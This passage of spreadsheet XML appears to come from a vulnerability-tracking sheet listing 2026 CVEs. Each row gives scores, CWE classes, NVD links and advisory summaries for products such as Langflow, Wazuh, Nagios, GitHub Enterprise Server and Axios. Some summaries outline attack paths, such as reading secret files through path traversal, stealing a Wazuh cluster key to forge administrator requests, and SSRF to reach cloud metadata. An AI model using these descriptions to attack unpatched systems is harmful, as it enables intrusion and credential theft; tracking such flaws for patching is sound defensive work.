      <c r="D2365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2365" s="5" t="inlineStr"/>
      <c r="F2365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2365" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2365" s="5" t="inlineStr"/>
      <c r="I2365" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2365" s="5" t="inlineStr"/>
      <c r="K2365" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2365" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway (`mcp-contextforge-gateway`) &lt;= v1.0.6 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive information due to a DNS rebinding vulnerability during tool invocation.</t>
        </is>
      </c>
      <c r="M2365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18905</t>
        </is>
      </c>
    </row>
    <row r="2366">
      <c r="A2366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19118</t>
        </is>
      </c>
      <c r="C2366" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2366" s="5" t="inlineStr"/>
      <c r="F2366" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2366" s="5" t="inlineStr"/>
      <c r="H2366" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I2366" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2366" s="5" t="inlineStr"/>
      <c r="K2366" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2366" s="5" t="inlineStr">
        <is>
          <t>A time-of-check time-of-use race condition vulnerability was identified in GitHub Enterprise Server that allowed remote code execution. Exploitation required an authenticated user with write access to a repository and precise timing of concurrent upload requests. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M2366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19118</t>
        </is>
      </c>
    </row>
    <row r="2367">
      <c r="A2367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19283</t>
        </is>
      </c>
      <c r="C2367" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2367" s="5" t="inlineStr"/>
      <c r="F2367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2367" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2367" s="5" t="inlineStr"/>
      <c r="I2367" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2367" s="5" t="inlineStr"/>
      <c r="K2367" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2367" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated remote attacker to obtain sensitive information, caused by missing destination namespace validation when copying etcd mTLS client credentials from the openshift-etcd system namespace into an attacker-controlled namespace.</t>
        </is>
      </c>
      <c r="M2367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19283</t>
        </is>
      </c>
    </row>
    <row r="2368">
      <c r="A2368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19304</t>
        </is>
      </c>
      <c r="C2368" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2368" s="5" t="inlineStr"/>
      <c r="F2368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2368" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2368" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2368" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2368" s="5" t="inlineStr"/>
      <c r="K2368" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2368" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information from internal services due to a URL parser discrepancy.</t>
        </is>
      </c>
      <c r="M2368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19304</t>
        </is>
      </c>
    </row>
    <row r="2369">
      <c r="A2369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19306</t>
        </is>
      </c>
      <c r="C2369" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2369" s="5" t="inlineStr"/>
      <c r="F2369" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2369" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2369" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2369" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2369" s="5" t="inlineStr"/>
      <c r="K2369" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2369" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows an authenticated attacker to read arbitrary files from the server filesystem — including server secret material (secret_key, JWT signing keys, the application database, /proc/self/environ, and other tenants' upload directories) — by supplying absolute paths or traversal sequences in the files parameter of an authenticated build request. The file contents were embedded as text attachments in the language model prompt and transmitted to the configured model endpoint, resulting in confidential data exfiltration. This bypassed the LANGFLOW_RESTRICT_LOCAL_FILE_ACCESS=true containment boundary, which was enforced for other file-reading components but not for the Chat Input to Message attachment pipeline.</t>
        </is>
      </c>
      <c r="M2369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19306</t>
        </is>
      </c>
    </row>
    <row r="2370">
      <c r="A2370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19397</t>
        </is>
      </c>
      <c r="C2370" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2370" s="5" t="inlineStr"/>
      <c r="F2370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2370" s="5" t="inlineStr"/>
      <c r="H2370" s="5" t="inlineStr"/>
      <c r="I2370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2370" s="5" t="inlineStr"/>
      <c r="K2370" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2370" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M2370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t>
        </is>
      </c>
    </row>
    <row r="2371">
      <c r="A2371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19584</t>
        </is>
      </c>
      <c r="C2371" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2371" s="5" t="inlineStr"/>
      <c r="F2371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2371" s="5" t="inlineStr"/>
      <c r="H2371" s="5" t="inlineStr"/>
      <c r="I2371" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2371" s="5" t="inlineStr"/>
      <c r="K2371" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2371" s="5" t="inlineStr">
        <is>
          <t>Velociraptor allows for the creation of notebook backups in its default enabled daily backup feature. When Velociraptor restores the backup, the notebook cell content is interpolated into a template with no ACL checks. This allows a malicious user with NOTEBOOK_EDITOR permission to plant a VQL query which will be evaluated at elevated permissions if the notebook's backup is subsequently restored.</t>
        </is>
      </c>
      <c r="M2371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19584</t>
        </is>
      </c>
    </row>
    <row r="2372">
      <c r="A2372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23920</t>
        </is>
      </c>
      <c r="C2372" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2372" s="5" t="inlineStr"/>
      <c r="F2372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2372" s="5" t="inlineStr"/>
      <c r="H2372" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I2372" s="5" t="inlineStr">
        <is>
          <t>2026-03-24</t>
        </is>
      </c>
      <c r="J2372" s="5" t="inlineStr"/>
      <c r="K2372" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2372" s="5" t="inlineStr">
        <is>
          <t>Host and event action script input is validated with a regex (set by the administrator), but the validation runs in multiline mode. If ^ and $ anchors are used in user input validation, an injected newline lets authenticated users bypass the check and inject shell commands.</t>
        </is>
      </c>
      <c r="M2372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23920</t>
        </is>
      </c>
    </row>
    <row r="2373">
      <c r="A2373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28802</t>
        </is>
      </c>
      <c r="C2373" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2373" s="5" t="inlineStr"/>
      <c r="F2373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2373" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2373" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I2373" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2373" s="5" t="inlineStr"/>
      <c r="K2373" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2373" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</t>
        </is>
      </c>
      <c r="M2373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28802</t>
        </is>
      </c>
    </row>
    <row r="2374">
      <c r="A2374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34948</t>
        </is>
      </c>
      <c r="C2374" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2374" s="5" t="inlineStr"/>
      <c r="F2374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2374" s="5" t="inlineStr"/>
      <c r="H2374" s="5" t="inlineStr"/>
      <c r="I2374" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2374" s="5" t="inlineStr"/>
      <c r="K2374" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2374" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, only classes present in the SELECT clause are protected by the silos access check in OQL. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34948</t>
        </is>
      </c>
    </row>
    <row r="2375">
      <c r="A2375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44252</t>
        </is>
      </c>
      <c r="C2375" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2375" s="5" t="inlineStr"/>
      <c r="F2375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2375" s="5" t="inlineStr"/>
      <c r="H2375" s="5" t="inlineStr"/>
      <c r="I2375" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2375" s="5" t="inlineStr"/>
      <c r="K2375" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2375" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.5, Wazuh Manager allows a low-privilege read-only API user with manager:read permission to retrieve the cluster key from the element in ossec.conf through GET /manager/configuration?raw=true. An attacker with network access to TCP port 1516 can use the disclosed Fernet key to impersonate a cluster worker and submit distributed API requests containing attacker-controlled rbac_permissions with rbac_mode set to black. Because the master trusts the worker-supplied authorization context, the attacker can create users, assign administrator roles, access credentials and API tokens, modify configuration, and execute actions across agents. This issue is fixed in version 4.14.5.</t>
        </is>
      </c>
      <c r="M2375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44252</t>
        </is>
      </c>
    </row>
    <row r="2376">
      <c r="A2376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44293</t>
        </is>
      </c>
      <c r="C2376" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2376" s="5" t="inlineStr"/>
      <c r="F2376" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2376" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2376" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I2376" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J2376" s="5" t="inlineStr"/>
      <c r="K2376" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2376" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated JavaScript for toObject conversion could include an unsafe expression derived from a schema-controlled bytes field default value. A crafted descriptor with a non-string default value for a bytes field could cause attacker-controlled code to be emitted into the generated conversion function. This vulnerability is fixed in 7.5.6 and 8.0.2.</t>
        </is>
      </c>
      <c r="M2376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44293</t>
        </is>
      </c>
    </row>
    <row r="2377">
      <c r="A2377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44495</t>
        </is>
      </c>
      <c r="C2377" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2377" s="5" t="inlineStr"/>
      <c r="F2377" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2377" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes, node.js</t>
        </is>
      </c>
      <c r="H2377" s="5" t="inlineStr">
        <is>
          <t>axios:axios, redhat:advanced_cluster_management_for_kubernetes, redhat:advanced_cluster_security, redhat:ansible_automation_platform, redhat:data_grid, redhat:developer_hub, redhat:discovery, redhat:openshift_container_platform, redhat:openshift_dev_spaces, redhat:openshift_service_mesh</t>
        </is>
      </c>
      <c r="I2377" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2377" s="5" t="inlineStr"/>
      <c r="K2377" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="L2377" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 0.19.0 to before 0.31.1 and 1.15.2, Axios contains prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request. This vulnerability is fixed in 0.31.1 and 1.15.2.</t>
        </is>
      </c>
      <c r="M2377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44495</t>
        </is>
      </c>
    </row>
    <row r="2378">
      <c r="A2378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4598</t>
        </is>
      </c>
      <c r="C2378" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2378" s="5" t="inlineStr"/>
      <c r="F2378" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2378" s="5" t="inlineStr"/>
      <c r="H2378" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I2378" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J2378" s="5" t="inlineStr"/>
      <c r="K2378" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-835</t>
        </is>
      </c>
      <c r="L2378" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Infinite loop via the bnModInverse function in ext/jsbn2.js when the BigInteger.modInverse implementation receives zero or negative inputs, allowing an attacker to hang the process permanently by supplying such crafted values (e.g., modInverse(0, m) or modInverse(-1, m)).</t>
        </is>
      </c>
      <c r="M2378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4598</t>
        </is>
      </c>
    </row>
    <row r="2379">
      <c r="A2379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4602</t>
        </is>
      </c>
      <c r="C2379" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2379" s="5" t="inlineStr"/>
      <c r="F2379" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2379" s="5" t="inlineStr"/>
      <c r="H2379" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I2379" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J2379" s="5" t="inlineStr"/>
      <c r="K2379" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L2379" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Incorrect Conversion between Numeric Types due to handling negative exponents in ext/jsbn2.js. An attacker can force the computation of incorrect modular inverses and break signature verification by calling modPow with a negative exponent.</t>
        </is>
      </c>
      <c r="M2379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4602</t>
        </is>
      </c>
    </row>
    <row r="2380">
      <c r="A2380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48553</t>
        </is>
      </c>
      <c r="C2380" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2380" s="5" t="inlineStr"/>
      <c r="F2380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2380" s="5" t="inlineStr"/>
      <c r="H2380" s="5" t="inlineStr"/>
      <c r="I2380" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2380" s="5" t="inlineStr"/>
      <c r="K2380" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2380" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.13 and Nagios XI before 2026R1.5 are vulnerable to authenticated remote code execution via custom-variable macro injection through the Nagios Remote Data Processor (NRDP). When a custom variable defined on a host, service, or contact is referenced in a shell-executed command line, an authenticated attacker with NRDP access can inject OS commands through the macro value. Exploitation requires a non-default configuration in which a custom variable is defined and referenced in a shell-executed command.</t>
        </is>
      </c>
      <c r="M2380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48553</t>
        </is>
      </c>
    </row>
    <row r="2381">
      <c r="A2381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48554</t>
        </is>
      </c>
      <c r="C2381" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2381" s="5" t="inlineStr"/>
      <c r="F2381" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2381" s="5" t="inlineStr"/>
      <c r="H2381" s="5" t="inlineStr"/>
      <c r="I2381" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2381" s="5" t="inlineStr"/>
      <c r="K2381" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2381" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to authenticated remote code execution via unfiltered NOTIFICATION-family macro substitution through the com_data parameter. When a notification command references $NOTIFICATIONCOMMENT$ or $NOTIFICATIONAUTHOR$ in a shell-reachable position, authenticated UI users can run arbitrary commands as the nagios user. Exploitation requires a non-default configuration in which a notification command references these macros in a shell-executed command line.</t>
        </is>
      </c>
      <c r="M2381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48554</t>
        </is>
      </c>
    </row>
    <row r="2382">
      <c r="A2382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53549</t>
        </is>
      </c>
      <c r="C2382" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2382" s="5" t="inlineStr"/>
      <c r="F2382" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2382" s="5" t="inlineStr"/>
      <c r="H2382" s="5" t="inlineStr"/>
      <c r="I2382" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2382" s="5" t="inlineStr"/>
      <c r="K2382" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2382" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the POST /host/db/proxy/test endpoint accepts the singleProxy, proxyChain, and testTarget request fields without validating their destination addresses. The testProxyConnectivity path uses raw TCP and SOCKS connections to attacker-selected hosts and ports, allowing an authenticated user to probe localhost, private networks, link-local metadata services, and other infrastructure reachable from the Termix server. Structured connection errors disclose host reachability and timing information, and successful metadata access can expose cloud credentials. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M2382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53549</t>
        </is>
      </c>
    </row>
    <row r="2383">
      <c r="A2383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53553</t>
        </is>
      </c>
      <c r="C2383" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2383" s="5" t="inlineStr"/>
      <c r="F2383" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2383" s="5" t="inlineStr"/>
      <c r="H2383" s="5" t="inlineStr"/>
      <c r="I2383" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2383" s="5" t="inlineStr"/>
      <c r="K2383" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22</t>
        </is>
      </c>
      <c r="L2383" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. Prior to version 1.18.0, a severe path traversal vulnerability exists in its backend API endpoints, specifically /deploy/fileDiff (File Compare), when handling file paths provided by the client. This issue has been patched in version 1.18.0.</t>
        </is>
      </c>
      <c r="M2383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53553</t>
        </is>
      </c>
    </row>
    <row r="2384">
      <c r="A2384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54493</t>
        </is>
      </c>
      <c r="C2384" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2384" s="5" t="inlineStr"/>
      <c r="F2384" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2384" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2384" s="5" t="inlineStr"/>
      <c r="I2384" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2384" s="5" t="inlineStr"/>
      <c r="K2384" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2384" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.0, the Subsonic-compatible createInternetRadioStation.view and updateInternetRadioStation.view routes accept an authenticated user's streamUrl without the SafeUrl and HasAudioContentType checks used by the regular radio API. app/Http/Requests/Subsonic/CreateInternetRadioStationRequest.php and app/Http/Requests/Subsonic/UpdateInternetRadioStationRequest.php pass the stored URL through app/Services/RadioService.php to app/Services/Radio/RadioStreamProxy.php, where RadioStreamProxy::openStream() calls fopen($url, 'r', false, $context). Streaming /radio/stream/{id} returns the upstream response body, allowing access to loopback, RFC1918, Docker bridge, metadata, or other internal HTTP services reachable from the Koel server. This issue is fixed in version 9.7.0.</t>
        </is>
      </c>
      <c r="M2384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54493</t>
        </is>
      </c>
    </row>
    <row r="2385">
      <c r="A2385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55523</t>
        </is>
      </c>
      <c r="C2385" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2385" s="5" t="inlineStr"/>
      <c r="F2385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2385" s="5" t="inlineStr"/>
      <c r="H2385" s="5" t="inlineStr"/>
      <c r="I2385" s="5" t="inlineStr">
        <is>
